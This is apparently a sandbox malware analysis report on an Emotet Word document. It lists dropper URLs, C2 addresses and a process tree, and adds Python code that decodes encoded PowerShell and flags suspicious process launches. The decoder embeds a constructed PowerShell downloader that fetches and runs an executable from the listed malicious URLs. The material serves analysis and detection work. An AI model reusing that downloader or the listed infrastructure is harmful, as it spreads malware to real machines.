Analysis

  • max time kernel
    30s
  • max time network
    24s
  • resource
    win7v191014
  • submitted
    03-02-2020 20:36

General

  • Target

    4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500.doc

  • Sample

    200203-8ntew7b5de

  • SHA256

    4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    https://pixtravelers.com/wp-admin/eRLY/
    http://jevelin.dongxanhshop.com/wp-admin/aw2mIU/
    http://new.dongxanhshop.com/wp-admin/52HY48070/
    http://demo.hbmonte.com/qkajzh322j/ApZ405/
    http://redwingdemo.dukaafrica.com/wp-content/Ad4DFk/

Extracted

  • Family
    emotet
  • C2
    71.197.197.100:80
    24.167.122.146:8080
    104.131.41.185:8080
    94.76.247.61:8080
    181.36.42.205:443
    72.29.55.174:80
    82.196.15.205:8080
    181.10.204.106:80
    217.199.160.224:8080
    58.171.38.26:80
    200.58.83.179:80
    192.241.146.84:8080
    190.70.1.69:80
    186.15.83.52:8080
    216.251.83.79:80
    62.75.160.178:8080
    181.29.101.13:8080
    190.6.193.152:8080
    186.200.205.170:80
    119.59.124.163:8080
  • rsa_pubkey.plain
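The PowerShell command line in the process tree is recorded only as "-e" followed by a base64 blob that is elided here. As an added example (Python, not the report's tooling and not the sample's code), this is the kind of decoder that produces the exe.dropper list above: it reverses the -e encoding (base64 of UTF-16LE text), then pulls the URLs and the dropped file name out of the plaintext. The embedded script is a constructed stand-in in the shape of the Emotet downloaders of that period carrying the five URLs the report lists; its variable names, the 40000-byte size check and the way the file name is assembled are assumptions, not the sample's actual code.

```python
import base64
import re
from typing import Dict, List

# Constructed stand-in for the elided command line. The report gives only the
# "-e" flag and the five exe.dropper URLs, so this script is hand-built in the
# shape of the Emotet downloaders of that period (an '@'-joined URL list split at
# runtime, a download loop, a size check, then Invoke-Item on the dropped file).
# Nothing here is the sample's actual code.
_CONSTRUCTED_SCRIPT = (
    "$Hrjw=('https://pixtravelers.com/wp-admin/eRLY/"
    "@http://jevelin.dongxanhshop.com/wp-admin/aw2mIU/"
    "@http://new.dongxanhshop.com/wp-admin/52HY48070/"
    "@http://demo.hbmonte.com/qkajzh322j/ApZ405/"
    "@http://redwingdemo.dukaafrica.com/wp-content/Ad4DFk/').Split('@');"
    "$Kdqw=$env:userprofile+'\\'+'641'+'.exe';"
    "foreach($u in $Hrjw){try{(New-Object Net.WebClient).DownloadFile($u,$Kdqw);"
    "if((Get-Item $Kdqw).length -ge 40000){Invoke-Item $Kdqw;break}}catch{}}"
)


def encode_command(script: str) -> str:
    """Produce what PowerShell expects after -e/-EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; restores the '=' padding that copied blobs often lose."""
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


# The command line as it would appear in a process tree (constructed).
SAMPLE_CMDLINE = "PoWERsheLL -e " + encode_command(_CONSTRUCTED_SCRIPT)

# -e, -ec, -enc, -encodedcommand: PowerShell accepts any unambiguous prefix.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Stop at quote, separator or closing paren so an '@'-joined list splits cleanly.
URL_RE = re.compile(r"https?://[^\s'\"@)]+")
# Matches the "'name'+'.exe'" concatenation used to hide the dropped file name.
DROP_RE = re.compile(r"'([^']+)'\+'(\.exe)'")


def extract_iocs(cmdline: str) -> Dict[str, object]:
    """Decode a 'powershell -e <blob>' command line and pull the dropper URLs
    and the dropped file name out of the plaintext script."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        raise ValueError("no encoded command found")
    script = decode_command(m.group(1))
    urls: List[str] = URL_RE.findall(script)
    drop = DROP_RE.search(script)
    return {
        "script": script,
        "urls": urls,
        "dropped_file": (drop.group(1) + drop.group(2)) if drop else None,
    }


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_CMDLINE)
    for u in iocs["urls"]:
        print("exe.dropper", u)
    print("drops", iocs["dropped_file"])
```

Two practical caveats: a plain base64 decode of a -e blob yields NUL-interleaved text, so the UTF-16LE step is not optional; and real samples of this family usually add junk string concatenation, backtick escapes and format-string tricks on top of the split list, so the regexes above are the last step after normalising the plaintext, not a substitute for reading it.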

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:2036
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e 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
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1620
  • C:\Users\Admin\641.exe
    C:\Users\Admin\641.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:544
    • C:\Users\Admin\641.exe
      --ba05ca91
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious use of SetWindowsHookEx
      • Drops file in System32 directory
      PID:1868
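Added example (Python, not from the report or the sample): a small triage pass over constructed process-creation events shaped like the tree above. It flags the two things the tree shows that are cheap to detect at scale: PowerShell launched with an encoded command under a case-mangled image name (PoWERsheLL.exe), and an executable sitting directly in a user profile root re-launching itself with an eight-hex-digit switch, the pattern of 641.exe spawning 641.exe --ba05ca91. The report shows WINWORD, PowerShell and the first 641.exe as tree roots, so the example asserts no parent link between them; the only parent link it uses is 544 -> 1868, which the nesting shows. The event layout, the benign control event, the shortened PowerShell blob and the severities are assumptions.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed process-creation events in the shape of Sysmon Event ID 1 records,
# modelled on the tree in this report. PIDs, images and command lines are the
# report's; 544 -> 1868 is the one parent link the tree's nesting shows, the other
# processes are tree roots and get ppid None. The last event is a benign control
# added for contrast, and the PowerShell blob is a constructed stand-in.
_BLOB = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode("ascii")

EVENTS: List[Dict] = [
    {"pid": 2036, "ppid": None,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                r'"C:\Users\Admin\AppData\Local\Temp\4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500.doc"'},
    {"pid": 1620, "ppid": None,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe",
     "cmdline": "PoWERsheLL -e " + _BLOB},
    {"pid": 544, "ppid": None,
     "image": r"C:\Users\Admin\641.exe",
     "cmdline": r"C:\Users\Admin\641.exe"},
    {"pid": 1868, "ppid": 544,
     "image": r"C:\Users\Admin\641.exe",
     "cmdline": r"C:\Users\Admin\641.exe --ba05ca91"},
    {"pid": 3001, "ppid": 3000,   # benign control: admin console, no encoded command
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Date"},
]

# -e, -ec, -enc, -encodedcommand followed by a base64 blob of plausible length.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE)
# An .exe directly under C:\Users\<user>\, not in AppData or Program Files.
USER_ROOT_EXE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)
# Trailing "--xxxxxxxx" switch, eight hex digits, as in "--ba05ca91".
HEX_SWITCH = re.compile(r"\s--[0-9a-f]{8}$")

Hit = Tuple[int, str, str]   # (pid, rule name, severity)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def rule_encoded_powershell(ev: Dict) -> Optional[Hit]:
    """PowerShell started with an encoded command. A case-mangled image name, as
    the report's PoWERsheLL.exe, raises severity; canonical casing stays medium."""
    name = _basename(ev["image"])
    if name.lower() != "powershell.exe" or not ENCODED_FLAG.search(ev["cmdline"]):
        return None
    mangled = name not in ("powershell.exe", "PowerShell.exe")
    return (ev["pid"], "encoded_powershell", "high" if mangled else "medium")


def rule_self_relaunch(ev: Dict, by_pid: Dict[int, Dict]) -> Optional[Hit]:
    """An .exe in a user profile root, started with a single eight-hex-digit
    switch; high if the parent is the same binary, medium otherwise."""
    if not USER_ROOT_EXE.match(ev["image"]) or not HEX_SWITCH.search(ev["cmdline"]):
        return None
    parent = by_pid.get(ev["ppid"])
    if parent and parent["image"].lower() == ev["image"].lower():
        return (ev["pid"], "dropped_exe_self_relaunch", "high")
    return (ev["pid"], "dropped_exe_hex_switch", "medium")


def triage(events: List[Dict]) -> List[Hit]:
    """Run both rules over every event and return the hits in event order."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[Hit] = []
    for ev in events:
        for hit in (rule_encoded_powershell(ev), rule_self_relaunch(ev, by_pid)):
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for pid, rule, sev in triage(EVENTS):
        print(f"PID {pid}: {rule} ({sev})")
```

Neither rule needs the Office-to-PowerShell parent link, which matters because this tree does not record one; if your telemetry does record it (WINWORD.EXE or another Office image as parent of powershell.exe), that is the stronger signal and belongs in front of these two.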

Downloads

  • C:\Users\Admin\641.exe

  • memory/544-10-0x00000000003B0000-0x00000000003C6000-memory.dmp
    Filesize 88KB
  • memory/1868-12-0x00000000003C0000-0x00000000003D6000-memory.dmp
    Filesize 88KB
  • memory/1868-13-0x0000000000400000-0x000000000047D000-memory.dmp
    Filesize 500KB
  • memory/2036-0-0x0000000006EB0000-0x0000000006FB0000-memory.dmp
    Filesize 1024KB
  • memory/2036-2-0x0000000007C40000-0x0000000007C44000-memory.dmp
    Filesize 16KB
  • memory/2036-5-0x0000000009D10000-0x0000000009D14000-memory.dmp
    Filesize 16KB
  • memory/2036-6-0x000000000AD90000-0x000000000AD94000-memory.dmp
    Filesize 16KB
  • memory/2036-7-0x000000000AD90000-0x000000000AD94000-memory.dmp
    Filesize 16KB